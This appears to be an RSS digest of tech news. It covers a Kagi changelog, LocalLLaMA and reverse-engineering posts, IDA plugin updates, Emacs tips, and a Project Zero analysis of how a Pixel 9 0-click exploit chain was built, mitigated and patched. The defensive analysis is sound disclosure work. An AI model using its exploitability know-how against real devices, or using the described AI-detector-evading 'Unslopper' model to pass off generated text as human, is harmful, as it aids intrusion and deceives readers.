- Sources section in story view now shows the number of publishers and articles
- Support for selecting multiple content languages, stories are automatically translated to your primary language when needed #8822 @LordDuckingling
- Exception messages are now localized for better clarity
- Improved image caching to reduce local storage usage
- Enhanced layout responsiveness on wide screens, including iPads and tablets
- General UI improvements across the app
Kagi Translate
- Help documentation redone (including detailed information about what you can do with URL parameters with Translate)
- Pinned languages and language history are now synced across devices if settings syncing is enabled
- Improved speech-to-text
- Background processing for document translations - start a job, switch tabs or close the browser, and download later
- Chinese localization tweaks @CTAO
- Alternatives button does not animate when only two characters are selected @CTAO
- No minimum text box size causes mobile view to become unusable below certain height #9499 @BenMacphail
- Japanese Input Issues on Mobile #9496 #9495 @TusedayGhost
- Clicking 'Show More' on long romanized text hides the box #9394 @theDoctor
- Alternative translation descriptions appear in target language #9431 @theDoctor
- Dictionary view pulls in other language tags and categories #9419 @ashemedai
- Duplicate language suggestions for "Detect Language" #9416 @dreifach
- Make buttons in Dictionary actual hyperlinks instead of js links #9408 @Thibaultmol
- Improve 'Dictionary sections' in Kagi Translate #9407 @Thibaultmol
- Document Wikitionary usage within Kagi Translate Dictionary #9405 @Thibaultmol
- Backdrop blur doesn't work in Safari on the translate pop-up controls @Carl
Kagi Maps
- Single clicking a city in maps doesn't do anything #9493 @CameronLittle
- Kagi maps doesn't show me the location linked to if I've given it location access #9492 @CameronLittle
- Extremely Distant Cafe & Restaurant Suggestions in Kagi Maps #9214 @Manipesto
- Maps Opening Hours Wrongly Shows Closed #9342 @Gredharm
- Maps Broken on Brave #9323 @Gredharm
Post of the week
Here is this week's featured social media mention:

We truly appreciate your support in spreading the word, so be sure to follow us and tag us in your comments!
2025: Year in Review
Explore the major updates, product launches, milestones and press highlights that defined last year for Kagi.

Windscribe partnership & privacy alliance

Kagi has partnered with Windscribe, Notesnook, Addy.io, and Ente to create a privacy-focused alliance. Read the announcement here, and check out our current Kagi Specials.
Kagi around the web
- Kagi News and Kagi Summarize are featured on a list of "incredible Android apps", check out the video review here.
- If you haven't yet, download Kagi News on iOS, Android, or view the web version, and grab Kagi Summarize on iOS or Android.
- Our video about Kagi Small Web is resonating with members. We talk about the purpose behind this initiative and why we're committed to growing it.
-
🔗 r/LocalLLaMA RTX 5070 Ti and RTX 5060 Ti 16 GB no longer manufactured rss
Nvidia has essentially killed off supply for the RTX 5070 Ti. Also supply of RTX 5060 Ti 16 GB has been significantly reduced. This happened partially due to memory supply shortages. This means that most AIBs will no longer manufacture these GPUs. Prices are already jumping significantly. The 5070 Ti has risen ~$100 over MSRP, and retailers expect further hikes. 8 GB configuration of RTX 5060 Ti remains unaffected.
Credit: Hardware Unboxed
https://m.youtube.com/watch?v=yteN21aJEvE
submitted by /u/Paramecium_caudatum_
[link] [comments] -
🔗 HexRaysSA/plugin-repository commits sync repo: +1 plugin, +1 release rss
sync repo: +1 plugin, +1 release. New plugins: [security-poc-plugin](https://github.com/0Eniltilps/foo) (1.0.0) -
🔗 r/reverseengineering Ghidra 12.0.1 has been released! rss
submitted by /u/ryanmkurtz
[link] [comments] -
🔗 HexRaysSA/plugin-repository commits sync repo: +2 plugins, +2 releases, -1 release rss
sync repo: +2 plugins, +2 releases, -1 release. New plugins: [sharingan](https://github.com/n0pex3/sharingan) (1.0.2), [tc_deer](https://github.com/arkup/tc_deer) (0.1.0). Changes: [Sharingan](https://github.com/n0pex3/sharingan): removed version(s) 1.0.2 -
🔗 HexRaysSA/plugin-repository commits sync repo: -2 releases rss
sync repo: -2 releases. Changes: [ida-chat](https://github.com/HexRaysSA/ida-chat-plugin): removed version(s) 1.0.0, 0.2.1 -
🔗 r/wiesbaden Looking for a hair salon for American-style blonde/balayage - any recommendations? rss
I'm American and looking for a new hair salon. I wear American-style blonde with balayage (cool tone, softly blended, no yellow/orange).
So far I've been going to Gold Rausch, but unfortunately I keep coming out with orange-tinged highlights, even though I explicitly ask for cool blonde tones.
Does anyone know a hairdresser or salon that really has experience with cool blonde / balayage to US standards? Ideally in the Frankfurt / Wiesbaden area.
submitted by /u/Alert-Count8542
[link] [comments] -
🔗 r/LocalLLaMA I trained a model to 'unslop' AI prose rss
I ran passages from Project Gutenberg through GPT-4o-mini 10 times over, each time telling it to "make it read far better, adding superior prose, etc.". This led to classic literary passages being enslopped. I then reversed this pipeline, and trained a model to go from [slop] -> [original]. The resulting model is capable enough to fool Pangram (a fairly robust AI detector - I take this as a metric of how 'human-sounding' the output is), at very little overall quality cost: While quality decreases slightly, humanness jumps from 0 to 0.481. The unslopped version stays firmly above Mistral Large 3 and close to the original GPT-5.2 baseline.
Of course, the model is OSS: https://huggingface.co/N8Programs/Unslopper-30B-A3B-bf16 And there are now GGUFs: https://huggingface.co/N8Programs/Unslopper-GGUF And there is a twitter thread (complete with 'thread below 👇', ironic in a thread about slop): https://x.com/N8Programs/status/2011591738591494625
The goal here is not to fool Pangram, deceive/cheat, etc. I only use Pangram as a proxy for the prose being more readable - ideally, you'd use this model to make your own AI-generated passages more palatable to read, or as part of a larger pipeline in automated writing generation for training, for instance.
Example (GPT-5.2):
The wind rose all at once, as if the mountain itself had inhaled. She stood at the edge of the pass, cloak snapping like a torn banner behind her, staring down at the valley where the last lights were going out one by one. Each flame extinguished felt deliberate—an answer to a question she had been too afraid to ask. Somewhere below, bells began to ring, not in warning, but in mourning. They already knew. “Don’t,” he said, breathless, reaching for her arm. His fingers brushed fabric, then air. “If you cross that line, there’s no coming back.” She didn’t turn. The cold burned her lungs, sharpened her thoughts. “There was never a way back,” she replied softly. “Only a way forward you were willing to pretend didn’t exist.” Thunder rolled, low and ancient. For a moment, the sky fractured into white fire, and in that instant he saw her face—resolved, terrified, incandescent with purpose. Not the girl he had sworn to protect, but the woman the world had demanded she become. “You’ll die,” he said. She smiled then, finally facing him, eyes bright with unshed tears. “So will everyone,” she answered. “The difference is what we leave burning when we’re gone.” She stepped forward. The mountain exhaled. Pangram Verdict: High Confidence AI Generated Unslopped (Temp=0.8, Rep Penalty=1.1, 6-bit MLX quant):
And then it just happened. Like the whole of reality had been held breathless for a moment, and suddenly sprang into focus. She stood at the pass's edge. Her cloak flapped behind her like a banner carried to its last stop. She was looking down into the valley, at lights being snuffed out one by one. Each flame extinguished was a point of answer to questions she had dared not ask. And now bells were ringing, not a signal but a dirge, because they already knew. "Please," he said. He reached for her; his hand closed on the snaking line of fabric that trailed behind her, then nothing. "You can't cross over." She didn't turn to him. It was cold enough to bite at her throat; she breathed it in, sharp and full of poison. "There was never a way out," she said softly. "Only the road in that you did not want to remember." A low rumble of thunder, older than mountains, filled the air. A white flash lit up the sky for a moment, a vivid static song of fire that illuminated her face in an instant. It was no longer the girl he'd sworn to protect, but the woman she had become. "You'll die." She smiled at him and turned toward him. There were tears on her face, but they did not fall. "We all do," she said. "The difference is what we leave behind us." She started walking toward the edge. And it all happened at once. The mountain exhaled itself, and took her with it. Pangram Verdict: High Confidence Human Written Note that there are some local coherence issues w/ the Unslopper - that's why I'd recommend integrating it into a larger pipeline or editing its output yourself. It's definitely not production ready. --------- As a bonus, the training of this model was entirely local! Done on one M3 Max w/ mlx-lm. Took 12 hours. submitted by /u/N8Karma
[link] [comments]
-
🔗 r/reverseengineering C/C++ Code Injection Utility for PS1, PS2, GameCube, and Wii. Re-implement reverse engineered functions, change functionality, add functionality, etc rss
submitted by /u/C0mposer
[link] [comments] -
🔗 r/LocalLLaMA Zhipu AI breaks US chip reliance with first major model trained on Huawei stack (GLM-Image) rss
submitted by /u/fallingdowndizzyvr
[link] [comments] -
🔗 Ampcode News Tab, Tab, Dead rss
We're removing Amp Tab. It is not part of the future that we see.
A year ago, most of our code was written by hand. In June, when we released Amp Tab, Amp was already writing the majority of our code. But now, Amp writes 90% of what we ship.
Amp Tab and other completion engines come from a world in which everyone believed humans would write most of the code and AI would be sprinkled on top.
But that world is dying! Look around! Some of our users are saying they haven't opened their editor in days and yet still shipped code. The bottleneck is now how fast you can get the code out, not how fast you can write it, they say.
The era of tab completion is coming to an end. We're entering the post-agentic age, in which it's a given that agents write most of the code.
There's so much to figure out, so much to build, so much to explore! We have to choose what to focus on.
We're focusing on what's coming next, not what brought us here.

Amp Tab will continue to work until the end of January 2026. After that, we can recommend Cursor, Copilot, or Zed if you need inline completions.

Here's Quinn and Thorsten on the end of Amp Tab and how they feel about it (Quinn will miss it):
-
- January 14, 2026
-
🔗 IDA Plugin Updates IDA Plugin Updates on 2026-01-14 rss
IDA Plugin Updates on 2026-01-14
New Releases:
- chernobog v5.2.0
- ghidra-chinese 20260114 - 20998739787
- HappyIDA v1.0.0
- ida-chat-plugin v0.2.6
- IDA-MCP v0.2.4
- ida-structor v0.5.0
- sharingan v1.0.2
- sharingan v1.0.1
- sharingan v1.0.0
Activity:
- chernobog
- 5d9b375a: perf: Accelerate AST pattern matching via SIMD and hash-based lookups
- cpp03
- 55c86ab2: Update README.md
- ghidra-chinese
- HappyIDA
- 37c1bc01: docs: update feature description
- 25c539cd: docs: update credits section
- 9be980ef: fix: correct plugin validation errors
- e7ad5532: docs: refine README feature table and SEH description
- 579762e5: update: add more explanation in readme
- 044b6e45: update: should use "sync" in readme
- 930493ea: update: add edittype and pastetype example in readme
- 9ec18126: fix: avoid matching the outermost block
- 4bc3b772: update: mention the two functionalities of SEH in readme
- 3b3b590e: update: add more examle in readme
- d70155de: update: add section parameter labeling in readme
- ida-chat-plugin
- ida-domain
- 949fd752: Update filelock and virtualenv to fix security vulnerabilities (#42)
- IDA-MCP
- 6651ea4c: Add http / stdio switch
- ida-structor
- 4718401e: feat: Add automatic type inference and SIMD-accelerated core algorithms
- IDAPluginList
- 14cb7766: chore: Auto update IDA plugins (Updated: 19, Cloned: 0, Failed: 0)
- msc-thesis-LLMs-to-rank-decompilers
- 5602df42: added test for server and edited some things
- rhabdomancer
- 1f880967: feat: add ttyname_r to the list of bad functions
- sharingan
- tenrec
- 30debe56: Merge pull request #14 from axelmierczuk/docs/improve-documentation
- 9a0a5f6c: docs: Restructure documentation with CLAUDE.md and agent_docs
- 2ace3e02: Merge pull request #13 from axelmierczuk/release/v1.0.1
- affee70f: Bump version to 1.0.1
- 2614d375: Merge pull request #12 from nonetype/local-type-filtering
- c3ca270a: Merge branch 'main' into local-type-filtering
- 4a16cc52: Merge pull request #11 from nonetype/main
-
🔗 sacha chua :: living an awesome life Visualizing and managing Pipewire audio graphs from Emacs rss
I want to be able to record, stream, screen share, and do speech recognition, possibly all at the same time. If I just try having those processes read directly from my microphone, I find that the audio skips. I'm on Linux, so it turns out that I can set up Pipewire with a virtual audio cable (loopback device) connecting my microphone to a virtual output (null sink) with some latency (100ms seems good) so that multiple applications listening to the null sink can get the audio packets smoothly.
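For readers who want to reproduce the loopback setup described above without a GUI, here is a minimal sketch using pactl (the PulseAudio compatibility tools provided by pipewire-pulse). The sink name virtual-mic and the source name alsa_input.usb-mic are placeholders, not names from the post; the 100 ms latency matches the value mentioned above:
import subprocess

def load_module(*args):
    # pactl prints the id of the newly loaded module on stdout
    out = subprocess.run(["pactl", "load-module", *args],
                         check=True, capture_output=True, text=True)
    return out.stdout.strip()

# Null sink that several applications can record from at once (via its monitor).
sink = load_module("module-null-sink", "sink_name=virtual-mic",
                   "sink_properties=device.description=VirtualMic")

# "Virtual audio cable": loop the real microphone into the null sink with ~100 ms latency.
loop = load_module("module-loopback",
                   "source=alsa_input.usb-mic",  # placeholder: pick yours from `pactl list short sources`
                   "sink=virtual-mic",
                   "latency_msec=100")
print(sink, loop)
Either module can be removed again with pactl unload-module followed by the printed id.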
I was getting a little confused connecting things to other things, though. qpwgraph was helpful for starting to understand how everything was actually connected to each other, and also for manually changing the connections on the fly.
Figure 1: qpwgraph screenshot
Like with other graphical applications, I found myself wondering: could I do this in Emacs instead? I wanted to just focus on a small set of the nodes. For example, I didn't need all of the lines connecting to the volume control apps. I also wanted the ability to focus on whichever nodes were connected to my microphone.
Unsurprisingly, there is a pipewire package in MELPA.
Figure 2: Screenshot of M-x pipewire from the pipewire package
I want to see and manage the connections between devices, though, so I started working on sachac/epwgraph: Emacs Pipewire graph visualization. This is what epwgraph-show looks like with everything in it:
Figure 3: epwgraph-show
Let's call it with C-u, which prompts for a regexp of nodes to focus on and another regexp for nodes to exclude. Then I can ignore the volume control:
Figure 4: Ignoring the volume control
I can focus on just the things that are connected to my microphone:
Figure 5: Focusing on a regular expression
This also lets me disconnect things with d (epwgraph-disconnect-logical-nodes):
Figure 6: Disconnecting a link
and connect them with c (epwgraph-connect-logical-nodes).
Figure 7: Connecting links
I don't have a fancy 5.1 sound system, so the logic for connecting nodes just maps L and R if possible.
Most of the time I just care about the logical devices instead of the specific left and right channels, but I can toggle the display with t so that I can see specific ports:
Figure 8: Showing specific ports
and I can use C and D to work with specific ports as well.
Figure 9: Connecting specific ports
I usually just want to quickly rewire a node so that it gets its input from a specified device, which I can do with i (epwgraph-rewire-inputs-for-logical-node).
Figure 10: Animated GIF showing how to change the input for a node.
I think this will help me stay sane when I try to scale up my audio configuration to having four or five web conferences going on at the same time, possibly with streaming speech recognition.
Ideas for next steps:
- I want to be able to set the left/right balance of audio, probably using pactl set-sink-volume <index> left% right%
In case this is useful for anyone else:
sachac/epwgraph: Emacs Pipewire graph visualization
You can e-mail me at sacha@sachachua.com.
-
🔗 batrachianai/toad The cosmetic release release
[0.5.31] - 2026-01-14
Changed
- Fix for diff highlights
- Minor cosmetic things
-
🔗 HexRaysSA/plugin-repository commits sync repo: +1 plugin, +1 release rss
sync repo: +1 plugin, +1 release. New plugins: [HappyIDA](https://github.com/HappyIDA/HappyIDA) (1.0.0) -
🔗 @cxiao@infosec.exchange and the netherlands. and [#canada](https://infosec.exchange/tags/canada) mastodon
and the netherlands. and #canada
the world has changed and i don't think i like this world very much
-
🔗 @cxiao@infosec.exchange [https://www.lemonde.fr/en/international/article/2026/01/14/greenland-denmark- mastodon
germany, france, sweden, denmark are all actually sending soldiers to greenland now
-
🔗 @cxiao@infosec.exchange gonna just post this gif repeatedly at increasingly faster speeds mastodon
gonna just post this gif repeatedly at increasingly faster speeds
-
🔗 @cxiao@infosec.exchange not sure what to say other than it feels like we are way over the line now, of mastodon
not sure what to say other than it feels like we are way over the line now, of NATO changing forever
-
🔗 r/reverseengineering FileDumper v1.0.1 - Simple Memory Forensic Dumper for Windows (Python 2 + memorpy) – Built with Grok in a Late-Night Session rss
submitted by /u/AcizBirKulKadir
[link] [comments] -
🔗 HexRaysSA/plugin-repository commits Merge pull request #17 from terrynini/patch-1 rss
Merge pull request #17 from terrynini/patch-1 -
🔗 sacha chua :: living an awesome life Emacs Lisp: Editing one file twice at the same time rss
@HaraldKi@nrw.social said:
Emacs can do everything. Except the most simple thing ever as I learned after 40 years in which I never needed it: Edit one file twice at the same time.
I can open a new Emacs "window" and re-open the file. But Emacs notices this and shows the file's buffer in the new window, not a new buffer.
But why? Well, when editing an SVG file, you can switch between the XML and the rendered image with C-c C-c, but I would like to see the XML and the rendered image next to each other.😀
You might think this is easy, just use M-x clone-indirect-buffer-other-window. But image-mode adds a wrinkle. It uses text properties to display the image, so even if you have two views of the same buffer thanks to clone-indirect-buffer, C-c C-c will toggle both of them. If we want to edit a file as both text and an SVG at the same time, we need to actually have two separate file buffers.
I started off by looking at how find-file works. From there, I went to find-file-noselect. Normally, find-file-noselect reuses any existing buffers visiting the same file. If it doesn't find any, it calls find-file-noselect-1. That lets me write this short function to jump straight to that step.
(defun my-find-file-always (filename &optional buffer-name)
  (interactive (list (read-file-name "File: ")))
  (setq buffer-name (or (create-file-buffer filename)))
  (let* ((truename (abbreviate-file-name (file-truename filename)))
         (attributes (file-attributes truename))
         (number (file-attribute-file-identifier attributes)))
    (with-current-buffer (find-file-noselect-1
                          (get-buffer-create buffer-name) truename t nil truename number)
      (when (called-interactively-p 'any)
        (switch-to-buffer (current-buffer)))
      (current-buffer))))

(defun my-clone-file-other-window ()
  (interactive)
  (display-buffer-other-window (my-find-file-always (buffer-file-name))))
This code unconditionally opens a buffer visiting a file, so you could have multiple buffers looking at the same file independently. With global-auto-revert-mode, editing the file in one buffer and saving it will result in changes in the other.
I sometimes play around with SVGs, and it might be helpful to be able to experiment with the source code of the SVG while seeing the changes refreshed automatically.
I really like how in Emacs, you can follow the trail of the functions to find out how they actually work.
Screencast demonstrating my-find-file-always
Transcript
00:00:00 The problem: clone-indirect-buffer-other-window and image-mode
@HaraldKi@nrw.social said, "Emacs can do everything except the most simple thing ever, as I learned after 40 years in which I never needed it: edit one file twice at the same time." You might think this is easy, just use M-x clone-indirect-buffer-other-window, but image mode adds a wrinkle. So let's show you how that works. I've got my test SVG here. We can say clone-indirect-buffer-other-window. But if I use C-c C-c, you'll notice that both of the windows change. That's because image mode uses text properties instead of some other kind of display. I mean, it's the same buffer that's being reused for the clone. So that doesn't work.
00:00:48 A quick tour of find-file
What I did was I looked at how find-file works. And then from there, I went to find-file-noselect. So this is find-file over here. If you look at the source code, you'll see how it uses find-file... It's a very short function, actually. It uses find-file-noselect. And find-file-noselect reuses a buffer if it can. Let's show you where we're looking for this. Ah, yes. So here's another buffer here. And what we want to do is we want to open a new file buffer no matter what. The way that find-file-noselect actually works is it calls this find-file-noselect-1. And by taking a look at how it figured out the raw file and the true name and the number to send to it, I was able to write this short function, my-find-file-always, and a my-clone-file-other-window.
00:01:46 Demonstration of my-find-file-always
So if I say my-find-file-always, then it will always open that file, even if it's already open elsewhere.
00:01:57 Cloning it into the other window
Let's show you how it works when I clone it in the other window. All right, so if I switch this one to text mode, I can make changes to it. More stuff goes here. And as you can see, that added this over here. I have global-auto-revert mode on, so it just refreshes automatically. So yeah, that's this function.
You can e-mail me at sacha@sachachua.com.
-
🔗 r/wiesbaden Where to take a fridge/dishwasher? rss
Hey everyone,
I need to get rid of a fridge and a dishwasher. They come from an estate. No luck on Kleinanzeigen so far - too good for the bin. The dishwasher is 2 years old, the fridge maybe 3. I have until the end of the month.
Is there a second-hand shop or Sozialkaufhaus in Wiesbaden that would take things like this?
Happy about any tips!
Edit: Thanks everyone! The items have found a new home!
submitted by /u/qweargss
[link] [comments] -
🔗 r/LocalLLaMA NeuTTS Nano: 120M Parameter On-Device TTS based on Llama3 rss
Hey everyone, The team at Neuphonic is back with a new open-source release: NeuTTS Nano. After NeuTTS Air trended #1 on HuggingFace last October, we received a lot of requests for something even smaller that could fit into tighter VRAM/RAM constraints for robotics and embedded agents.
Key Specs:
- Model Size: 120M active parameters (3x smaller than NeuTTS Air).
- Architecture: Simple LM + codec architecture built off Llama3.
- Format: Provided in GGML for easy deployment on mobile, Jetson, and Raspberry Pi.
- Capabilities: Instant voice cloning (3s sample) and ultra-realistic prosody.
Why use this? If you are building for smart home devices, robotics, or mobile apps where every MB of RAM matters, Nano is designed for you. It delivers the same "voice magic" but in a much lighter package. Links:
- GitHub: https://github.com/neuphonic/neutts
- HuggingFace: https://huggingface.co/neuphonic/neutts-nano
- Spaces: https://huggingface.co/spaces/neuphonic/neutts-nano
- Website: https://www.neuphonic.com/
We’re curious to see the RTF (Real-Time Factor) benchmarks the community gets on different hardware. What’s the smallest device you’re planning to run this on?
submitted by /u/TeamNeuphonic
[link] [comments]
-
🔗 @HexRaysSA@infosec.exchange 📢 LAST CALL: IDA Plugin Contest! mastodon
📢 LAST CALL: IDA Plugin Contest!
The submission window closes January 15, 2026 @ 11:59pm CET.
Read the entry instructions and full details here:
https://hex-rays.com/plugin-contest
Good luck!
-
🔗 HexRaysSA/plugin-repository commits Request for adding HappyIDA plugin rss
Request for adding HappyIDA plugin -
🔗 r/LocalLLaMA Soprano 1.1-80M released: 95% fewer hallucinations and 63% preference rate over Soprano-80M rss
Hello everyone! Today, I am announcing Soprano 1.1! I’ve designed it for massively improved stability and audio quality over the original model. While many of you were happy with the quality of Soprano, it had a tendency to start, well, Mongolian throat singing. Contrary to its name, Soprano is NOT supposed to be for singing, so I have reduced the frequency of these hallucinations by 95%. Soprano 1.1-80M also has a 50% lower WER than Soprano-80M, with comparable clarity to much larger models like Chatterbox-Turbo and VibeVoice. In addition, it now supports sentences up to 30 seconds long, up from 15.
The outputs of Soprano could sometimes have a lot of artifacting and high-frequency noise. This was because the model was severely undertrained. I have trained Soprano further to reduce these audio artifacts. According to a blind study I conducted on my family (against their will), they preferred Soprano 1.1's outputs 63% of the time, so these changes have produced a noticeably improved model.
You can check out the new Soprano here:
Model: https://huggingface.co/ekwek/Soprano-1.1-80M
Try Soprano 1.1 Now: https://huggingface.co/spaces/ekwek/Soprano-TTS
Github: https://github.com/ekwek1/soprano
- Eugene
submitted by /u/eugenekwek
[link] [comments]
-
🔗 r/LocalLLaMA NVIDIA's new 8B model is Orchestrator-8B, a specialized 8-billion-parameter AI designed not to answer everything itself, but to intelligently manage and route complex tasks to different tools (like web search, code execution, other LLMs) for greater efficiency rss
I’ve seen some arguments we’ve reached AGI, it’s just about putting the separate pieces together in the right context. I think having a relatively small model that knows how to connect with other tools and models is exactly the correct route towards very functional systems.
submitted by /u/Fear_ltself
[link] [comments] -
🔗 Project Zero A 0-click exploit chain for the Pixel 9 Part 3: Where do we go from here? rss
While our previous two blog posts provided technical recommendations for increasing the effort required by attackers to develop 0-click exploit chains, our experience finding, reporting and exploiting these vulnerabilities highlighted some broader issues in the Android ecosystem. This post describes the problems we encountered and recommendations for improvement.
Audio Attack Surface
The Dolby UDC is part of the 0-click attack surface of most Android devices because of audio transcription in the Google Messages application. Incoming audio messages are transcribed before a user interacts with the message. On Pixel 9, a second process
com.google.android.tts also decodes incoming audio. Its purpose is not completely clear, but it seems to be related to making incoming messages searchable.

Both processes decode audio using all decoders available on the device, including the UDC, which is integrated by the OEMs of most devices, though the bulk of incoming messages use a small number of audio formats. In particular, it is very unlikely that an incoming message will contain audio in formats supported by the Dolby UDC, as Android devices do not provide encoders for these formats, and they are mostly used by commercial media, such as movies and TV shows. Removing the UDC and other uncommonly-used decoders from the 0-click attack surface of Android would protect users from the worst consequences of vulnerabilities in these codecs.
The explosion of AI-powered features on mobile phones has the potential to greatly increase their 0-click attack surface. While this trade-off can sometimes benefit users, it is important for mobile vendors to be aware of the impact on security. It is not uncommon for software changes to unintentionally increase the amount of code that can be exercised by attackers remotely. Ongoing review of how new features affect 0 and 1-click attack surfaces coupled with deliberate decisions are necessary to protect users.
Bug Discovery Time Frames
One surprising aspect of this research was how quickly we found both vulnerabilities used in the exploit chain. Project Zero reviewed the Dolby UDC as a part of a one-week team hackathon, and it took less than two days for Ivan to find CVE-2025-54957. Likewise, Seth found CVE-2025-36934 after less than one day of reviewing the BigWave driver.
Of course, it’s easy to forget the effort that went into finding these attack surfaces: the Dolby hackathon required roughly three weeks of preparation to study the entry points of the codec and set up tooling to debug it, and likewise, reviewing the BigWave driver involved a driver analysis tool that took roughly four weeks to develop. We also reviewed other audio codecs with mixed results before reviewing the Dolby UDC.
Still, the time investment required to find the necessary vulnerabilities was small compared to the impact of this exploit, especially for the privilege escalation stage. Moreover, a lot of the time we spent finding the UDC bug was a one-time cost that we expect to enable future research. The time needed to find the bugs for a 0-click exploit chain on Android can almost certainly be measured in person-weeks for a well-resourced attacker.
Android has invested a fair amount in the security of media codecs through vulnerability rewards programs and by fuzzing them with tools like OSS-Fuzz. While it is unlikely that fuzzing would have uncovered this particular UDC bug, as far as we know, Pixel’s fuzzing efforts do not cover the UDC. Gaps in vendors’ understanding of their attack surface are a common source of 0-click vulnerabilities. While bugs occur in heavily-secured components, it can be easier for attackers to focus on areas that are overlooked. Android and OEMs could benefit from a rigorous analysis of their 0-click attack surfaces, and comprehensive efforts to fuzz and review them.
Drivers, on the other hand, continue to be a ‘soft target’ on Android. While Android and its upstream driver vendors such as Samsung, Qualcomm, ARM and Imagination have made some efforts to improve driver security, they have been outpaced by attackers’ ability to find and exploit these bugs. Google’s Threat Intelligence Group (GTIG) has detected and reported 16 Android driver vulnerabilities being used by attackers in the wild since 2023. Driver security remains an urgent problem affecting Android’s users that will likely require multiple approaches to improve. Rewriting the most vulnerable drivers in memory-safe languages such as Rust, performing consistent security reviews on new drivers, reducing driver access from unprivileged contexts and making driver code more easily updatable on Android devices are likely all necessary to counter attackers’ extensive capabilities in this area.
Ease of Exploitability
We estimate that exploiting the Dolby UDC vulnerability in the exploit chain took eight person-weeks and exploiting the BigWave driver vulnerability took three weeks for a basic proof-of-concept. This is not a lot of time considering the vast capabilities this type of exploit chain gives attackers. While many Android security features increased the challenge we faced in exploiting these issues, we were also surprised by two mitigations that did not provide their documented protection.
The Dolby UDC decoder process on the Pixel 9 lacked a seccomp policy, though this policy is implemented in AOSP and several other Android 16 devices we tested. If the policy in AOSP had been enforced on the Pixel 9, it likely would have added at least one person-month to the time spent developing this exploit. For security features to be effective, it is important that they are verified on a regular basis, ideally for every release, otherwise it is possible that regressions go unnoticed.
We also discovered that kASLR is not effective on Pixel devices, due to a problem that has been known since 2016, detailed in this blog post. Both Android and Linux made a decision to deprioritize development work that would have restored its effectiveness. This decision made exploiting the BigWave vulnerability easier; we estimate it would have taken roughly six weeks longer to exploit this vulnerability with effective kASLR, though with the additional time required, we may not have pursued it.
It is also notable that we have not been able to successfully exploit the Dolby UDC vulnerability on Mac or iPhone so far, as it was compiled with the -fbounds-safety compiler flag, which added a memory bounds check that prevents the bug from writing out of bounds. Dolby should consider providing such compiler based protections across all platforms. Apple also recently implemented MIE, a hardware-based memory-protection technology similar to Memory Tagging (MTE), on new devices. While MIE would not prevent the Dolby UDC vulnerability from being exploited in the absence of -fbounds-safety due to UDC using a custom allocator, it would probabilistically hinder an iOS kernel vulnerability similar to the BigWave driver bug from being exploitable.
Pixel 8 onwards shipped with MTE, but unfortunately, the feature has not been enabled except for users who opt into Advanced Protection mode, to the detriment of Pixel’s other users. Apple’s inclusion of memory protection features, despite their financial and performance cost, clearly paid off with regards to protecting its users from the UDC exploit as well as possible kernel privilege escalation. There is the potential to protect Android users similarly.
Another remarkable aspect of this exploit chain is how few bugs it contains. Gaining kernel privileges from a 0-click context required only two software defects. Longer exploit chains are typically required on certain platforms because of effective sandboxing and other privilege limitation features. To bypass these, attackers need to find multiple bugs to escalate privileges through multiple contexts. This suggests potential sandboxing opportunities on Android, especially with regards to reducing the privileges of the frequently-targeted media decoding processes.
Patch Timeframe
Both vulnerabilities in this exploit chain were public and unfixed on Pixel for some time. The UDC vulnerability was reported to Dolby on June 26, 2025, and the first binary fixes were pushed to ChromeOS on September 18, 2025. Pixel shared with us that they did not receive binary patches from Dolby until October 8, 2025. We disclosed the bug publicly on October 15, 2025, after 30 days patch adoption time, as per Project Zero’s disclosure policy. Samsung was the first mobile vendor to patch the vulnerability, on November 12, 2025. Pixel did not ship a patch for the vulnerability until January 5, 2026.
It is alarming that it took 139 days for a vulnerability exploitable in a 0-click context to get patched on any Android device, and it took Pixel 54 days longer. The vulnerability was public for 82 days before it was patched by Pixel.
One cause of the slow fix time was likely Dolby’s advisory. We informed Dolby that this issue was highly exploitable when we filed the bug, and provided status updates, including technical details of our exploit, as the work progressed. Despite this, the advisory describes the vulnerability’s impact as follows:
We are aware of a report found with Google Pixel devices indicating that there is a possible increased risk of vulnerability if this bug is used alongside other known Pixel vulnerabilities. Other Android mobile devices could be at risk of similar vulnerabilities.
This is not an accurate assessment of the risk this vulnerability poses. As shown in Part 1 of this blog post, the vulnerability is exploitable on its own, with no additional bugs. Dolby is likely referring to the fact that additional vulnerabilities are required to escalate privileges from the mediacodec context on Android, but almost all modern vulnerabilities require this, and we informed them that there is strong evidence that exploit vendors have access to kernel privilege escalation vulnerabilities on most Android devices. No other vendor we’ve encountered has described a vulnerability allowing code execution in a sandboxed context as requiring the bug to be “used alongside other known […] vulnerabilities.”
Dolby’s advisory also says:
For other device classes, we believe the risk of using this bug maliciously is low and the most commonly observed outcome is a media player crash or restart.
We believe this understates the risk of the vulnerability to other platforms. It’s difficult to determine the “risk of [attackers] using this bug maliciously”; even well-resourced threat analysis teams like GTIG have difficulty determining this for a particular bug with any accuracy. Moreover, “most commonly observed outcome is a media player crash or restart” is true of even the most severe memory corruption vulnerabilities. This is why most security teams classify vulnerabilities based on the maximum access an attacker could achieve with them. Except on Apple devices, where the UDC is compiled with -fbounds-safety, this bug enables code execution in the context that the UDC runs in. The impact of this bug on users is also platform-dependent; for example, it presents a higher risk on Android, where untrusted audio files are processed without user interaction, than on a smart TV which only plays audio from a small number of trusted streaming sources, but this doesn’t change that an attacker can generally achieve code execution by exploiting this bug. Ideally, Dolby would have provided its integrators with this information, and allowed them to make risk decisions depending on how they use and sandbox the UDC.
It’s not clear what information Dolby provided Android and Pixel, but Android publishes its priority matrix here. Since mediacodec is considered a constrained context, when we reported it, the UDC bug fell into the category of “remote arbitrary code execution in a constrained context”, and it was rated Moderate. Conversely, Samsung rated this bug as Critical. Android shared with us they recently updated their priority matrix, and future vulnerabilities of this type will be classified as Critical.
We reported the BigWave vulnerability to Pixel on June 20, 2025 and it was also rated Moderate. As per the matrix above, “Local arbitrary code execution in a privileged context, the bootloader chain, THB, or the OS kernel” makes this bug High base severity, but the severity modifier “Requires running as a privileged context to execute the attack” was applied. While the modifier text states a “privileged context”, our experience is that the modifier is frequently applied to vulnerabilities that are not directly accessible from an unprivileged context, including those accessible from constrained contexts like mediacodec. The severity was changed to High on September 18, 2025 and a fix was shipped to devices on January 6, 2026. We shared the bug publicly after 90 days, on September 19, 2025, in accordance with our disclosure policy.
While different software vendors and projects have different philosophies with regards to vulnerability prioritization, deprioritizing both of these bugs left users vulnerable to a 0-click exploit chain. Some vendors make bugs in 0-click entrypoints high priority, while others choose to prioritize bugs in the sandboxes that isolate these entrypoints. There are benefits and downsides to each approach, but vendors need to prioritize at least one bug in the chain in order to provide users with a basic level of protection against 0-click exploits.
